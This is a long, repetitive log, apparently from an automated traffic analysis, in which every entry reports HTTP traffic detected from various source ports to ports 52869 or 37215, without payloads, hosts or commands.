Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58396 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56648 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48994 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57370 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 57370
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47398 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44378 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55950 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33776 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35428 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51686 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33478 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34166 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34166
Source: unknown	Network traffic detected: HTTP traffic on port 34168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34166
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34168
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 34168
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47206 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43580 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60976 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57018 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33232 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
